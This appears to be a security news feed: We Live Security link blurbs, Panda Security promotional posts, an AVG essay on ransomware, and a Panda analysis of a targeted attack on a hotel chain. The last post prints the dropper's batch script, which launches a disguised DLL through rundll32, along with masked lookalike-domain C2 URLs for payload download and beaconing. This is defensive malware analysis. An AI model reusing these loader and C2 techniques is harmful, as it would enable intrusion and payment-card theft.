The UK-based telecommunications company TalkTalk has seen its profits more than halve, following last year’s “significant and sustained cyberattack”.
The post TalkTalk profits halve following last year’s major cyberattack appeared first on We Live Security.
SWIFT has delivered a strongly-worded statement that rejects the claims made by both Bangladesh Bank and Bangladesh Police’s Criminal Investigation Department over one of the biggest cyberheists in history.
The post SWIFT: We’re not responsible for Bangladesh Bank cyberheist appeared first on We Live Security.
Panda Security has been awarded Company of the Year at the 5th Annual “Premios Nacionales El Suplemento“.
Organized by the Spanish newspaper El Suplemento by ABC, at the “Premios Nacionales El Suplemento” well-deserved recognition is given to outstanding businesses and their hardworking professionals, who, despite the current economy, are boosting their efforts to be better leaders, stepup and grow, on a daily basis.
The gala honored 34 winners, with one winner in each category. Panda Security was awarded the night’s most coveted prize: Company of the Year. The company joined a group of exceptional winners—highlighting important professionals and Spanish companies, or businesses with headquarters in Spain—who have excelled in different sectors by their innovative work, growth, outreach , and history.
Center: Rosa Díaz, the General Director of Panda Security Spain, collected the award on behalf of the Bilbao-based, computer security company.
Although Panda Security is mostly known as an anti-virus software company, it has expanded its line of business to advanced cyber security technology. Rosa Díaz said that, thanks to Adaptive Defense 360, Panda is a pioneer in uniting EPP and EDR systems in the same solution. The new security model is capable of monitoring, registering and categorizing all active processes on the system.
This year, some of the highlighted winners include Turkish Airlines in the “Airline” category, the NGO Messengers of Peace in “Solidarity”, and Kone for his work in “Sustainability”, among others.
Panda Security is one of the leading manufacturers of security software in the world. They are included in Truffle 100´s list of Top European Software Vendors.
Among its milestones in technology, the pioneer has also launched security systems with concepts like SaaS (Security as a Service), or the anti-virus that protects from the Cloud (Cloud Computing). Panda is also recognized as the first security service provider to offer daily updates of your database signatures.
Panda Security also introduced the first automatic detection, analysis and classification of malware in real-time for systems. This is called Collective Intelligence” and, together with patented technology that blocks unknown viruses, is the precursor of Panda´s new security model: Adaptive Defense.
It is our desire that these awards will encourage professionals and companies to continue their innovation, outreach and in good practices.
Congratulations to all the winners!
The post Panda Security named Company of the Year at the 5th Annual “Premios Nacionales El Suplemento” appeared first on Panda Security Mediacenter.
Top tech organizations have been “ordered” to disclose their approach to security updates with mobile devices.
The post Top tech firms ordered to disclose approach to mobile patches appeared first on We Live Security.
Be careful! Not all anti-virus systems are what they seem and many are more hazardous than helpful for your cyber security, so was said in a recent investigation. The investigation concluded that, today, most anti-virus’ tend to lower the threshold of Internet browser security. Can they protect us against external threats? How effective are they?
Traditionally, browsers incorporate tools to check certificates issued by websites to ensure that it has been issued by an appropriate entity. Panda Security’s products do not use interception techniques like intrusive man-in-the-middle through TLS proxies, to analyze our customers’ communications. Our solutions are completely transparent and do not install any type of certificate for this function. Thanks to this we can avoid these type of vulnerabilities, while minimizing the impact on the communication performance for our users’ devices. For this reason, Panda solutions are not included in the study.
Panda’s products are mentioned as those not affected by this vulnerability in Concordia University’s report.
The affected anti-virus systems in the study trick browsers, causing them to relax and trust any certificate, even though they shouldn´t. On the contrary, Panda Security solutions appears in this report because of its transparency and reliability for its users.
The post Panda Security, the tested anti-virus appeared first on Panda Security Mediacenter.
Data breaches are widespread among large businesses in the UK, according to a new report. The Cyber Security Breaches Survey found that two-thirds of the biggest firms have experienced an attack of some kind over the past 12 months.
The post Big businesses in the UK ‘experience regular data breaches’ appeared first on We Live Security.
Welcome to this week’s security review, which includes Jigsaw & the increasing aggressiveness of ransomware and the importance of passphrases.
The post The security review: Jigsaw and passphrases appeared first on We Live Security.
Alina Simone’s gripping 2015 account of her mother’s extortion ordeal was the first time many non-tech people had heard the term “Ransomware”. It presented a threat that felt intensely personal. It blocked access to data we use to define ourselves: family photos, letters to relatives, tax and financial records, and beloved music and movies.
Flash forward a year, and ransomware is all over the media. The reason for its rise is simple: money.
Before the emergence of ransomware, criminals mainly used (and still use) malware to take control of machines. Malicious code harvested user names, passwords, and credit card numbers. It might have also used infected PCs in a botnet for sending spam or launching attacks that shut down major websites, usually as a decoy while hackers broke in elsewhere.
For Criminals, Ransomware Is Lucrative
Ransomware cuts out the digital middlemen. Rather than collect credit card details that must then be sold on the dark web for a few cents to a few dollars, ransomware demands money directly from the victims. While the amount varies, it tends to be few hundred dollars for individuals.
Yet these small sums are taking a heavy toll. The exact number of ransomware attacks is hard to gauge, as many go unreported. But according to our data they are rising fast. While official complaints about ransomware (and ransoms paid) to the US Department of Justice amounted to only around $24 million in damages in 2015, other numbers are much higher. In April, CNBC estimated the cost of ransomware at around $200 million in the first three months of 2016 alone. Late last year, the Cyber Threat Alliance stated that a single piece of ransomware, CrytopWall v3, resulted in an estimated $325 million in damages worldwide over the course of its lifetime. And as far back as June 2014, the FBI issued a report saying CryptoLocker swindled more than $27 million from users over a two-month period.
Bigger Targets May Mean Bigger Paydays
These numbers speak to the audacity of ransomware purveyors. The long-tail effect of attacking individuals has proven so lucrative, it is unlikely to ever go away. But many organizations also hold sensitive customer data that needs to be protected both to ensure effective service and consumer privacy. That makes them particularly juicy targets to hackers.
Healthcare provides are a case in point. If they lose control of patient information, they may be unable to deliver treatment when needed. There are also strict legal requirements governing the protection of patient data. Both make them subject to lawsuits that could cost them far more than what they would have to pay in ransom. A hospital in Hollywood, California, paid $17,000 in bitcoin to hackers after being locked out of their data. Fortunately, so far, other reported attacks have fared less well. Healthcare providers in Kentucky and Ottawa refused to pay, as no patient data was compromised; and an attack in Germany was quickly contained by fast-acting IT staff.
Still, the hospitals have had to invest considerable time and resources into fighting the attacks. They will also need to launch multiple efforts internally and externally to restore patient trust.
And hospitals are not alone. A 2016 report by the Institute for Critical Infrastructure Technology, an industry think tank, declares 2016 the year of ransomware, suggesting few organizations are safe. For instance, systems at an Israeli electrical utility were infected by ransomware after a phishing attack. A utility in Michigan has been allegedly attacked. Multiple police stations have been hit and paid ransoms to regain access to their systems. Local governments are increasingly feeling the pressure, with attacks reported in places as diverse as Alto City, Texas, and Lincolnshire, UK. And criminals have subverted online adverts of venerable media organizations, such as the BBC and NYT, turning their websites into potential sources of drive-by ransomware.
The Right Protection Saves Money
This is why protection is essential, especially for individual users, most of whom lack the expertise and resources of even modest city councils and small hospitals. Over a three-month period earlier this year, a conservative estimate by AVG is that its antivirus prevented around $47 million in extortion demands through the interception of just three types of ransomware: Cryt0L0cker, CryptoWall, and TeslaCrypt. And that number says nothing of the mental and emotional costs that would have resulted from feeling violated or the costs of replacing machines, software, and media if a victim decided not to pay.
AVG does not recommend paying. There is no guarantee criminals will release the files. They may also leave a piece of malicious code behind that allows them to strike again. It is better to call tech support, salvage what you can, make frequent backups, and build a fortress around your PC – and thus prevent the writing of another news story like Alina Simone’s.
The New York State Office of the Attorney General has experienced a massive increase in the number of reported data breaches in 2016.
The post New York experiences surge in reported data breaches appeared first on We Live Security.
Recently, we published a report where we discussed the numerous attacks on major hotel chains. The attacks were directed mainly towards credit card theft. Attackers do this by infecting point-of-sale terminals in these types of establishments. A few days ago, one of our Adaptive Defense 360 clients, a luxury hotel chain, suffered an attack. I wanted to take advantage of this opportunity to show how cyber-criminals are entering company networks.
We know that, in most cases, these types of attacks are initiated through an email with an attached file that compromises the victim’s computer, or a link to a page that uses vulnerabilities to achieve the attacker’s objective. In our client’s case, the attack began with an email message addressed to a hotel employee stating the attachment provided all the information needed to pay for a hotel stay at the end of May 2016.
The message contained a zipped file attachment, which when opened contained a file with a Microsoft Word icon. When the file was executed, it showed the following:
This is a hotel reservation form that is to be filled out by a customer. They wrote their payment information for a stay at the end of May 2016. As you can see, it does not appear unusual. In fact, this document is identical to those that this hotel employee sends to his customers (even the name is the same), but if we look closely, we will see that the file comes from a zip. Despite that the Word icon shows up, it is an executable file.
When you run it, three files are created on the disk and the first one runs:
– reader_sl.cmd
– ROCA.ING.docx
– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)
The contents of the first file is shown below:
@echo off
start “” ROCA.ING.docx
Set xOS=x64
If “%PROCESSOR_ARCHITECTURE%”==”x86” If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86
IF “%xOS%” == “x64” (start “” C:WindowsSysWOW64rundll32.exe adobeUpd.dll,Wenk)
IF “%xOS%” == “x86” (start “” C:WindowsSystem32rundll32.exe adobeUpd.dll,Wenk)
ping -n 12 localhost
As we can see, the first thing it does to its victim is open the Word document in order to run and complete the trick. Then, adobeUpd.dll runs with the parameter “Wenk”. While executed, it modifies the file and marks it as read-only and hidden, and creates an entry in the Windows registry that runs every time the computer is turned on.
Contact with a specific URL:
http://www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw
Then it downloads a file that contains the user of the given URL parameter (iPmbzfAIRMFw). In the event of a match, it attempts to download the file
http://www.************.ga/en/scripts/iPmbzfAIRMFw.jpg
When we try to download it, it is not available; it will not be in our customer system either, as we blocked the infection attempt and the malware was not able to run there. The domain of the URL is exactly the same domain as our customer, except that they have “.com” while the attackers registered a domain with the same name but in Gabon (“.ga”). This way, the similarity to the domain name won’t attract attention if it is seen by the hotel’s security team when analyzing network traffic.
In spite of the fact that the file iPmbzfAIRMFw.jpg is not available, if we look at the code adobeUpd.dll we can see that they are actually looking for a specific mark in this file, then it decrypts the data from it and runs it as a PE (created as “Tempsystm”).
Subsequently, adobeUpd.dll remains in a loop, randomly connecting every several minutes to:
http://www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm
As we see, this attack is specifically directed to this hotel chain. The criminals have already removed all traces of the server where you could connect to the malware, and as we aborted the attack we can only speculate what is what they were going to do next. In our experience, this type of attacks seeks to engage a team of the enterprise of the victim to then move laterally to reach its ultimate goal: the point-of-sale terminals that process the credit card payments, as we have seen in so many other cases.
The traditional anti-virus does not work against this type of attack, since they are threats created specifically for a victim and they always ensure that the malware is not detected by signatures, proactive technologies, etc. that current anti-malware solutions have built. That is why have EDR type of services (Endpoint Detection & Response) are equipped with advanced protection technology, something vital for effective protection against these attacks.
The post Advanced Attacks against Hotel Chains: A practical example appeared first on Panda Security Mediacenter.
